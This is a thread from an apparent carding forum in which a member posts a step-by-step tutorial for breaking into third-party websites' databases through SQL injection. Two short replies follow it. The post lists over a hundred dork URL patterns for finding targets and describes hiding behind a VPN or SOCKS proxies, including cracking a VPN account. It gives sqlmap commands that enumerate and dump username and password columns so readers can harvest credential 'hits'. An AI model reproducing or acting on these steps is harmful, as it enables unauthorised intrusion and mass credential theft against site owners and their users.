✨ CONTACT ADMIN FOR ADVERTISEMENT ✨
📧 EMAIL: crdpro7@gmail.com
Carding Game
CrdPro

New DB Dumping Method Tutorial (Private & Fast) [with Pictures]

F

ForlaxPy

Member
[font=Roboto, sans-serif]Preface:[/font]


[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]I have been into DB hacking for quite a while[/font]
[font=Roboto, sans-serif]now and always struggled finding new and[/font]
[font=Roboto, sans-serif]private databases to get good hits from.[/font]
[font=Roboto, sans-serif]I spoke with some very HQ members of this[/font]
[font=Roboto, sans-serif]community which were able to expand my[/font]
[font=Roboto, sans-serif]knowledge a lot. I planned on selling this[/font]
[font=Roboto, sans-serif]as an E-Book but after all everyone[/font]
[font=Roboto, sans-serif]should have access to private databases[/font]
[font=Roboto, sans-serif]as long as they are part of this community[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]!You might think this tutorial seems familliar at the beginning but the interesting part comes at the end so don't click away!

Okay now enough of this BS and lets get started!  [/font]
[font=Roboto, sans-serif][hide][/font]
[font=Roboto, sans-serif]1. Python 2.7 + click +[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]2. SQLmap + click +[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]3. SQLiDumper + click +[/font]

4. VPN Accounts (Check Accounts Section) [Hide My Ass works best)

[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]5* . RDP / VPS[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]* not needed but helpfull[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]__________________________________________________________________________________________[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]Let's get started:[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]1. Create a new Folder called "DB Hacking" or something along[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]these lines. (Why? -> Else you might loose the overview)[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]2. Download and install Python 2.7.XXX.[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]Remember to add Python to your system path (Should look like this)[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]
be7f8edabe4e4fdda2859d44750a5113fe2ddfe5
[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]3. Download SQLiDumper 8.3 and add it into your folder.[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]Folder: DB Hacking
∟ SQLi Dumper 8.3[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]3. Download the newest sqlmap version and also add it into your folder.[/font]
[font=Roboto, sans-serif] 
 [/font]
[font=Roboto, sans-serif]Folder: DB Hacking
∟ SQLi Dumper 8.3[/font]
[font=Roboto, sans-serif]∟ sqlmapproject-xx[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]3. Go get yourself some dorks.[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]You dont know how?[/font]
+ click +
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]Or just use mine (These wont give you private DBs as other ppl can use them too)[/font]

Code: 
profilefree.php?companyid=
art.php?content=
OnlineGames.asp?serieId=
show-patch.asp?uid=
dettaglio-referenza.asp?id=
coursedetail.html?id=
event_detail.asp?ev_id=
shop-item.php?id=
buynow.aspx?posid=
donation_search.php?f_school_id=
location_detail.php?idlocation=
detalle.php?rec_id=
actividades_unidade.asp?cod_unidade=
detalle.php?palabra=
special-price.html?size=
home.php?nav=
testimonios.php?id=
navsource.html?page_id=
healthandsafety.php?Action=
categories.asp?cid=
dispnews.php?idw=
training_detail.php?id=
custom_page.asp?id=
salelisting_new.asp?desc=
shopnames.php?letter=
division.asp?Id=
ShowCat.aspx?secId=
search.asp?strsearchtype=
news-detail.php?news=
default.asp?brandcode=
show_category.aspx?ParentCategoryID=
productlist.asp?categoryname=
index.asp?k=
IND_interiorSecciones.php?s=
member-benefits.php?mod=
rubrique.php?id_rub=
wpdocumentdisplay.aspx?contentid=
photo.asp?mmum=
pagegallery.php?pgid=
taxicard_type.php?type_id=
print_list.php?id=
kwsearch.php?word=
specifications-gallery.php?gallery=
ItemDetails.aspx?ItemID=
produits.php?docid=
pool.asp?hdnContent=
calendar_details.asp?xid=
s_noticias.asp?id=
ethnobotany.php?sterm=
consulta_main.php?id_imovel=
productlist.aspx?attributetype=
get_product.php?productid=
detail_en.asp?newsid=
dormire-bere-mangiare-san-vincenzo-scheda.php?id=
spotsspecies.php?s_specie_id=
Energize.php?cate=
productss_en.asp?bigclassid=
article.php?fid=
scheda_articolo.php?id=
downloadcatsearch.asp?cat=
star-bar.php?pid=
EventListing.asp?id=
actiuni_prezentare.php?idx=
ADDetail.asp?ID=
detailproduct.php?id=
knowledge_base.php?issue=
detail.php?id_product=
start.asp?productid=
licence.php?lang=
gru_en.php?id=
jobsearch.aspx?lang=
elook_anli.asp?id=
childrens-publisher.php?src=
movie.php?tvid=
jerseys.php?jersey_id=
departments.php?dept=
search.php?username=
cms.php?bf=
buy-detail.php?nwid=
index.asp?property_id=
VendorDetail.aspx?vid=
template_list.asp?code=
BookDesc.asp?catId=
ibm.asp?svpage=
jugar.php?id=
item_viewDesc.php?no=
ResultPage.aspx?pi=
page.asp?contentid=
article_b.asp?id=
customer_content.php?category_id=
application.asp?groupid=
eventview.php?cid=
kategori.php?kategori=
bulletin_board.asp?issue_id=
review.php?listing_id=
detalleNoticia.php?id_contenido=
default.asp?ERROR_CODE=
get_download.php?id=
rtrd.php?sfm_from_iframe=
interna.asp?Menu=
link_detail.php?linksPage=
property_list.php?county=
searchcatalog.asp?PartID=
article.htm?id=
ProductDetails.php?brand_id=
severdig_pub.php?Id=
comunicacao-visual-produtos.php?categ=
numerology_how_it_works.php?page=
reader.php?objid=
perfiles.php?id=
chama_centro_paginas.php?pg=
index.asp?configurar=
hot_jobs.asp?artID=
Discoveryontarget_Sponsor.aspx?id=
noticias.asp?lingua=
pettravelguide.php?pg=
show.php?kat=
greeting.aspx?format=
pp.php?id=
stilius.php?id=
history.asp?pageguid=


[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]4. Open SQLi Dumper 8.3 and paste your Dorks[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]
781eec435741488f0970514b3fe1ed3a492e623b
[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif](You can now choose between using HMA 2.8.24.0 or proxies)[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]How to use HMA:[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]
[/font]
[font=Roboto, sans-serif][size=small][font=Roboto, sans-serif]1. Buy / Crack a premium Acc.[/font]
[/font][/size]
[font=Roboto, sans-serif]2. Download HMA 2.8.24.0[/font]
[font=Roboto, sans-serif]3. Put in you login Deatails and connect fot the first time[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]
ee67c2424941169b7f4b8b391e0b287508dc7707
[/font]
[font=Roboto, sans-serif]
ccb0cab63b5518f1424a0d0a178c94bb161d4f87
[/font]
[font=Roboto, sans-serif]  
29b5b7d1d83a66f483232f2b7dba7febff9e5744
f84de16f2c4484fb166802805c32d9527560ef54
781eec435741488f0970514b3fe1ed3a492e623b
[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif][size=small][font=Roboto, sans-serif]Then reconnect your VPN and click Start Scanner > URLS only in SQLi Dumper[/font]

[/font][/size]
[font=Roboto, sans-serif]
[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]How to use Proxies:[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]
[/font]
[font=Roboto, sans-serif][size=small][font=Roboto, sans-serif]Go to www.socks24.org and download the newest proxy-list.[/font]
[/font][/size]
[font=Roboto, sans-serif]In SQLiDumper go to Tools & Settings -> Proxy[/font]
[font=Roboto, sans-serif]And paste all your downloaded proxies into the SOCKS5 4 column and Test them[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]
8b5d357149d40a4c5f664363a17f7b564dfeae8d
c81305e7a875eaffd914081ceaf7b902e07ffbd4
[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]And paste all your downloaded proxies into the SOCKS5 4 column and Test them[/font]
[font=Roboto, sans-serif]It will take about 20 mins to check them all.[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]...wait untill all are checked...[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]Click ok.[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif][size=small][font=Roboto, sans-serif]Now from the Dropdown choose SOCKS5 4 Protocoll.[/font]

[/font][/size]
[font=Roboto, sans-serif]
[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]5. Start Checking the dorks.[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]This proccess will take a while and that why I recommend using a RDP / VPS but you can do it on your main PC too.

After a few hrs you should have around 20k URLs and now can start checking them by canceling the Online Scanner.[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]So switch to the exploitables tab and click < Start Scanner >[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]Wait for them to be checked completely.[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]Now go to the next Tab "Injectables" and start this as well.[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]You will notice that most of the URLs are Non-Injectable (But these are what we are here for).[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]6. "Injecting the Non-Injectables" <- lmao sounds like a movie[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]Go to the Non-Injectables Tab and CTRL+A > Right click > Clipboard[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]Go into your sqlmap folder and create a urls.txt[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]Folder: DB Hacking
∟ SQLi Dumper 8.3[/font]
[font=Roboto, sans-serif] sqlmapproject-xx[/font]
[font=Roboto, sans-serif]∟ urls.txt[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]Paste all your Non-Inkectables in there.[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]Now Shift + Right Mouse[/font]
[font=Roboto, sans-serif]> Open cmd/powershell here[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]Now for the important command:[/font]
sqlmap.py -m "urls.txt" --random-agent -f --batch -o --tables --output-dir=OUTPUT
[font=Roboto, sans-serif] 
 [/font]
[font=Roboto, sans-serif]This command will now use the newest injections available and print out all the databases which are injectable.[/font]
[font=Roboto, sans-serif]You can always check which sites have already been tested by taking a look into the "OUTPUT" folder[/font]
[font=Roboto, sans-serif]There will be a lot of folders in the OUTPUT directory.[/font]
[font=Roboto, sans-serif]As some are still Non-Injectable I wrote a script to only keep the ones that are:

Download[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]https://www.file-upload.net/download-13433178/Cleaner.py.html[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]Run the file and you will be left with all folders containing a vulnerable Database. Now go back into the sqlmap folder and[/font]
[font=Roboto, sans-serif]open the cmd/powershell again.[/font]
[font=Roboto, sans-serif]Choose a folder from your output dir and open the target.txt[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]Copy the URL in there.[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]Now in your cmd type:[/font]
sqlmap.py -u "yoururl" --batch --dbs --output-dir=OUTPUT
[font=Roboto, sans-serif]This will give you a list of the DBs:[/font]
[font=Roboto, sans-serif]Now choose a DB which sounds like it would include the user:pass and type:[/font]
sqlmap.py -u "yoururl" --batch -D "Database Name" --tables --output-dir=OUTPUT
[font=Roboto, sans-serif]Now you have all table look for one like "users/ registration/ login..." and type:[/font]
sqlmap.py -u "yoururl" --batch -D "Database Name" -T "Tablename" --columns --output-dir=OUTPUT
[font=Roboto, sans-serif]If you found the information you are looking for type:[/font]
sqlmap.py -u "yoururl" --batch -D "Database Name" -T "Tablename" -C "Columns (example: username, pass)" --dump --eta --threads=5 --output-dir=OUTPUT
[font=Roboto, sans-serif] 
 [/font]
[font=Roboto, sans-serif]This will now dump the columns and give you an ETA of when they are done. Sometimes the passwords are encrypted and need to be dehased which sqlmap does automatically. Its really fast and easy. So have fun getting your private databases and show me some hits u got below.[/font]

[font=Roboto, sans-serif]Don't Forget to leave a Like if you found this helpful![/font]

[font=Roboto, sans-serif][/hide][/font]
 
Forlax said:
[font=Roboto, sans-serif]Preface:[/font]


[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]I have been into DB hacking for quite a while[/font]
[font=Roboto, sans-serif]now and always struggled finding new and[/font]
[font=Roboto, sans-serif]private databases to get good hits from.[/font]
[font=Roboto, sans-serif]I spoke with some very HQ members of this[/font]
[font=Roboto, sans-serif]community which were able to expand my[/font]
[font=Roboto, sans-serif]knowledge a lot. I planned on selling this[/font]
[font=Roboto, sans-serif]as an E-Book but after all everyone[/font]
[font=Roboto, sans-serif]should have access to private databases[/font]
[font=Roboto, sans-serif]as long as they are part of this community[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]!You might think this tutorial seems familliar at the beginning but the interesting part comes at the end so don't click away!

Okay now enough of this BS and lets get started!  [/font]
Click to expand...

LIKED!
 
Forlax said:
[font=Roboto, sans-serif]Preface:[/font]


[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]I have been into DB hacking for quite a while[/font]
[font=Roboto, sans-serif]now and always struggled finding new and[/font]
[font=Roboto, sans-serif]private databases to get good hits from.[/font]
[font=Roboto, sans-serif]I spoke with some very HQ members of this[/font]
[font=Roboto, sans-serif]community which were able to expand my[/font]
[font=Roboto, sans-serif]knowledge a lot. I planned on selling this[/font]
[font=Roboto, sans-serif]as an E-Book but after all everyone[/font]
[font=Roboto, sans-serif]should have access to private databases[/font]
[font=Roboto, sans-serif]as long as they are part of this community[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]!You might think this tutorial seems familliar at the beginning but the interesting part comes at the end so don't click away!

Okay now enough of this BS and lets get started!  [/font]
Click to expand...
LInux or windows needed?
 
You must log in or register to reply here.
Back
Top